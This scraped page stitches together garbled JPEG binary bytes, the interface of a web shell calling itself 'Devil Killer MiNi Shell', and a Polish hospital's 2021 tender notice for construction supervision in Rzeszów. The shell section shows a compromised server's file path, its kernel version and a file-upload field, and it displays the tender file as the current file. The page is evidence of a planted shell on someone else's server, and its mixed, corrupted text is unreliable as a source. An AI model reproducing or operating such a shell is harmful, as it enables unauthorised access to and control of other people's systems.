JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211229/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211229/0033528901-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa pełnienia wielobranżowego nadzoru inwestorskiego. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Kliniczny Szpital Wojewódzki Nr 1 im. Fryderyka Chopina w Rzeszowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 690724114</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Szopena 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rzeszów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">35-055</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dzp@szpital.rzeszow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.szpital.rzeszow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa pełnienia wielobranżowego nadzoru inwestorskiego. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6963e266-6887-11ec-ae77-fe331fedffdc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00335289</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00004570/48/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.18 Pełnienie wielobranżowego nadzoru inwestorskiego nad realizacją zadania inwestycyjnego pn. Wykonanie robót budowlanych i instalacyjnych dla przebudowy pomieszczeń II piętra w budynku „A” i „BG”.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/pcmrzeszow <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://portal.smartpzp.pl/pcmrzeszow</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami, w szczególności składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń, odbywa się przy użyciu środków komunikacji elektronicznej zapewnionych przez System zapewniający obsługę procesu udzielania zamówień publicznych za pośrednictwem środków<br/>komunikacji elektronicznej, zwany dalej Systemem. Szczegóły opisano w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Szczegóły Klauzuli informacyjnej z art. 13 RODO zastosowanej przez zamawiającego w celu związanym z postępowaniem o udzielenie zamówienia<br/>publicznego opisano w SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.261.2-I.2021, Postępowanie nr 96</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest pełnienie wielobranżowego nadzoru inwestorskiego (branży konstrukcyjno - budowlanej, instalacji sanitarnych, instalacji elektrycznych i elektroenergetycznych) nad realizacją zadania inwestycyjnego pn. „Wykonanie robót budowlanych i instalacyjnych dla przebudowy pomieszczeń II piętra w budynku „A” i „BG”, użytkowanych przez Klinikę Ginekologii i Położnictwa w Klinicznym Szpitalu Wojewódzkim nr 1 im. Fryderyka Chopina w Rzeszowie wraz z dostawą i montażem niezbędnego wyposażenia.”<br/>Zamówienie wykonywane będzie w oparciu o dokumentacje projektowe, specyfikacje techniczne wykonania i odbioru robót oraz kosztorysy nakładcze dla zakresu robót budowlanych, nad którymi pełniona będzie funkcja Inspektora Nadzoru Inwestorskiego.<br/>2. Opis Przedmiotu Zamówienia stanowi Załącznik nr 1 do SWZ oraz dokumentacja projektowa oraz Specyfikacje Techniczne Wykonania i Odbioru Robót.<br/>UWAGA! <br/>Szczegółowy zakres inwestycji, terminy i warunki jej realizacji, projektowane postanowienia umowy, dokumentacja projektowa oraz inne dane zamieszczone są na:<br/>•	stronie platformy zakupowej (System): https://portal.smartpzp.pl/pcmrzeszow - strona internetowa prowadzonego postępowania,<br/>•	stronie internetowej Zamawiającego: www.bip.szpital.rzeszow.pl.,<br/>w Postępowaniu nr 87/ZP.261.1-I.2021 p.n.: <br/>„Wykonanie robót budowlanych i instalacyjnych dla przebudowy pomieszczeń II piętra w budynku „A” i „BG”, użytkowanych przez Klinikę Ginekologii i Położnictwa w Klinicznym Szpitalu Wojewódzkim im. Fryderyka Chopina w Rzeszowie wraz z dostawą i montażem niezbędnego wyposażenia.”<br/>3.	Zamawiający nie dopuszcza możliwości składania ofert równoważnych.<br/>4. Kat. CPC: 12 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71520000-9 - Usługi nadzoru budowlanego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71247000-1 - Nadzór nad robotami budowlanymi</p> <p class="mb-0">71630000-3 - Usługi kontroli i nadzoru technicznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>a)	Cena brutto oferty zł - 60%.<br/>b)	Doświadczenie zawodowe osób skierowanych do realizacji zamówienia - 40%.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe osób skierowanych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym; Zamawiający nie stawia w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w szczególny sposób.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: Zamawiający nie stawia w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w szczególny sposób.<br/>3)	sytuacji ekonomicznej lub finansowej: Zamawiający nie stawia w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w szczególny sposób.<br/>4)	zdolności technicznej lub zawodowej: O zamówienie publiczne mogą ubiegać się Wykonawcy, którzy:<br/>4.1.)	wykonali w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie co najmniej jedną usługę polegającą na pełnieniu funkcji Inspektora Nadzoru Inwestorskiego w zakres, której wchodziły jako minimum: sprawdzenie dokumentacji projektowej, kompleksowe zarządzanie robotami budowlanymi (w tym nadzór inwestorski) w zakresie technicznym, terminowym, finansowym, prawnym, sprawozdawczym oraz w zakresie zgodności z Kontraktem i wymaganiami Ustawy prawo budowlane i innych powszechnie obowiązujących przepisów prawa, przygotowanie dokumentów służących rozliczeniu inwestycji, rozliczenie robót budowlanych - dla zadania inwestycyjnego polegającego na budowie lub przebudowie lub remoncie obiektu wg Polskiej Klasyfikacji Obiektów Budowlanych należącego do klasy 1264 (budynki szpitali i zakładów opieki medycznej), którego zakres obejmował wykonanie robót rozbiórkowych, konstrukcyjnych, wykończeniowych, instalacji grzewczych, wodociągowych i kanalizacyjnych, instalacji wentylacji mechanicznej i klimatyzacji, instalacji elektrycznych i teletechnicznych, instalacji gazów medycznych o wartości usługi co najmniej 10 000 000,00 zł brutto (dziesięć milionów złotych), gdzie roboty prowadzone były na czynnym obiekcie i przy jego normalnym, zgodnym z przeznaczeniem funkcjonowaniu oraz załączą dowody potwierdzające, że ta usługa została wykonana należycie.<br/><br/>Wzór wykazu stanowi Załącznik nr 8 do SWZ.<br/><br/>4.2.)	wykażą, że dysponują osobami niezbędnymi do realizacji zamówienia publicznego, w szczególności odpowiedzialnymi za świadczenie usług, spełniającymi następujące wymagania:<br/><br/>A.	jedna osoba do pełnienia funkcji - Koordynatora Inspektorów Nadzoru Inwestorskiego - Inspektor nadzoru inwestorskiego robót konstrukcyjno-budowlanych: <br/>a)	uprawnienia - uprawnienia budowlane do wykonywania samodzielnych funkcji technicznych w budownictwie w rozumieniu ustawy Prawo budowlane (t.j. Dz.U. z 2021r., poz. 2351), w specjalności konstrukcyjno-budowlanej bez ograniczeń lub odpowiadające im zakresem uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz wpis na listę członków właściwej izby samorządu zawodowego;<br/>b)	doświadczenie - co najmniej 10 lat od momentu uzyskania uprawnień budowlanych w pełnieniu funkcji Inspektora nadzoru inwestorskiego. Pełnił funkcję inspektora nadzoru inwestorskiego robót konstrukcyjno-budowlanych przy realizacji min. jednego zadania inwestycyjnego polegającego na budowie lub przebudowie lub remoncie obiektu wg Polskiej Klasyfikacji Obiektów Budowlanych należącego do klasy 1264 (budynki szpitali i zakładów opieki medycznej) o powierzchni użytkowej min. 1 200,00 m2. Inwestycja była prowadzona, odebrana i oddana do użytkowania (decyzja o pozwoleniu na użytkowanie) przy udziale wskazanej osoby.<br/><br/>B. jedna osoba do pełnienia funkcji – Inspektora nadzoru inwestorskiego robót instalacji sanitarnych:<br/>a)	uprawnienia - uprawnienia budowlane do wykonywania samodzielnych funkcji technicznych w budownictwie w rozumieniu ustawy Prawo budowlane (t.j. Dz.U. z 2021r., poz. 2351) w specjalności instalacyjnej bez ograniczeń w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń lub odpowiadające im zakresem uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz wpis na listę członków właściwej izby samorządu zawodowego;<br/>b)	doświadczenie - co najmniej 8 lat od momentu uzyskania uprawnień budowlanych w pełnieniu funkcji Inspektora nadzoru inwestorskiego. Pełnił funkcję inspektora nadzoru inwestorskiego robót instalacji sanitarnych przy realizacji min. jednego zadania inwestycyjnego polegającego na budowie lub przebudowie lub remoncie obiektu wg Polskiej Klasyfikacji Obiektów Budowlanych należącego do klasy 1264 (budynki szpitali i zakładów opieki medycznej) o powierzchni użytkowej min. 1 200,00 m2. Inwestycja była prowadzona, odebrana i oddana do użytkowania (decyzja o pozwoleniu na użytkowanie) przy udziale wskazanej osoby.<br/><br/>C.	jedna osoba do pełnienia funkcji - Inspektora nadzoru inwestorskiego robót instalacji elektrycznych:<br/>a)	uprawnienia - uprawnienia budowlane do wykonywania samodzielnych funkcji technicznych w budownictwie w rozumieniu ustawy Prawo budowlane (t.j. Dz.U. z 2021r., poz. 2351), w specjalności instalacyjnej, w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń lub odpowiadające im zakresem uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz wpis na listę członków właściwej izby samorządu zawodowego;<br/>b)	doświadczenie - co najmniej 8 lat od momentu uzyskania uprawnień budowlanych w pełnieniu funkcji Inspektora nadzoru inwestorskiego. Pełnił funkcję inspektora nadzoru inwestorskiego robót instalacji elektrycznych przy realizacji min. jednego zadania inwestycyjnego polegającego na budowie lub przebudowie lub remoncie obiektu wg Polskiej Klasyfikacji Obiektów Budowlanych należącego do klasy 1264 (budynki szpitali i zakładów opieki medycznej) o powierzchni użytkowej min. 1 200,00 m2. Inwestycja była prowadzona, odebrana i oddana do użytkowania (decyzja o pozwoleniu na użytkowanie) przy udziale wskazanej osoby.<br/><br/> Wzór wykazu stanowi Załącznik nr 9 do SWZ.<br/><br/>UWAGA: <br/>1.	Zamawiający zgodnie z w art. 27 Ustawy Prawo Budowlane z dnia 07 lipca 1994r. (t.j. Dz.U. z 2021, poz. 2351) wyznacza jednego z inspektorów jako koordynatora inspektorów nadzoru inwestorskiego - Inspektor nadzoru inwestorskiego robót konstrukcyjno- budowlanych.<br/>2.	Zamawiający dopuszcza czasowe wzajemne zastępstwo specjalistów personelu inspektora nadzoru inwestorskiego np. na okres urlopowy, na okres choroby, lub inne okoliczności, przez osoby posiadające ten sam rodzaj uprawnień, o takich samych lub wyższych kwalifikacjach zawodowych jakie opisano w niniejszej SWZ. Oznacza to, że zastępstwo osoby z personelu inspektora nadzoru inwestorskiego przejmować mogą wyłącznie osoby spełniające warunki udziału w postępowaniu.Za personel uznane będą osoby wyznaczone do realizacji <br/>zamówienia, wskazane w warunkach udziału, a wyszczególnione w Wykazie osób skierowanych do realizacji zamówienia.<br/>3.	Za rozpoczęcie inwestycji rozumie się uczestniczenie w jej realizacji od momentu przekazania placu budowy wykonawcy robót budowlanych i zgłoszeniu przejęcia obowiązków.<br/>4.	Za zakończenie inwestycji rozumie się uczestniczenie wskazanych osób w pracach odbiorowych wykonanych robót budowlanych i instalacyjnych oraz w procedurze końcowego rozliczenia finansowego inwestycji.<br/>5.	Zamawiający określając wymogi dla osób w zakresie posiadanych uprawnień budowlanych <br/>dopuszcza odpowiadające im ważne uprawnienia budowlane, które zostały wydane na<br/>podstawie wcześniej obowiązujących przepisów oraz odpowiadające uprawnienia wydane <br/>obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konferencji Szwajcarskiej z <br/>zastrzeżeniem art. 12a oraz innych przepisów Ustawy – Prawo budowlane oraz Ustawy z dnia<br/>22 grudnia 2015r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach<br/>członkowskich Unii Europejskiej (t.j. Dz.U. z 2021 r. poz. 1646).<br/>W takim przypadku Wykonawca zobowiązany jest na własny koszt zapewnić tłumacza języka polskiego, który na bieżąco dokona wszelkich tłumaczeń dokumentów związanych z realizacją robót budowlanych stworzonych przez Wykonawcę oraz Zamawiającego. Tłumacz powinien być biegły w zagadnieniach technicznych, prawnych oraz ekonomicznych.<br/>Jeżeli Wykonawca dysponuje osobą lub osobami posiadającymi uprawnienia, które mają miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zobowiązany jest wykazać, że osoby te legitymują się kwalifikacjami odpowiadającymi wymaganym uprawnieniom w kraju zamieszkania, jeżeli takie w tym kraju obowiązują, z uwzględnieniem prawa do wykonywania określonych zawodów regulowanych lub określonych działalności, jeżeli te kwalifikacje zostały uznane na zasadach przewidzianych w Ustawie o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej.<br/>6.	Samodzielne funkcje techniczne w budownictwie, mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych.<br/>7.	W przypadku, gdy wartości określone w dokumentach przedkładanych na potwierdzenie<br/>spełnienia warunku doświadczenia zostaną wyrażone w walutach obcych to do oceny spełnienia warunku zostaną przeliczone na złote (PLN) według średniego kursu NBP danej<br/>waluty do PLN z dnia publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykaz podmiotowych środków dowodowych aktualnych na dzień złożenia potwierdzających brak podstaw wykluczenia opisano SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania przez Wykonawcę warunku udziału w postępowaniu dotyczącego zdolności technicznej lub zawodowej, Zmawiający żąda następującego podmiotowego środka dowodowego:<br/>1)	Wykazu usług wykonanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; <br/><br/>Okresy wyrażone w latach lub miesiącach liczy się wstecz od dnia, w którym upływa termin składania ofert.<br/><br/>Jeżeli wykonawca powołuje się na doświadczenie w realizacji usług, wykonywanych wspólnie z innymi wykonawcami, złożony przez Wykonawcę Wykaz usług, powinien dotyczyć usług w których wykonaniu wykonawca ten bezpośrednio uczestniczył.<br/><br/>2)	wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich uprawnień, doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Wykaz wymaganych przedmiotowych środków dowodowych opisano w SWZ. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Wykaz wymaganych przedmiotowych środków dowodowych, które podlegają uzupełnieniu opisano w SWZ. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykaz innych wymaganych oświadczeń lub dokumentów opisano w SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 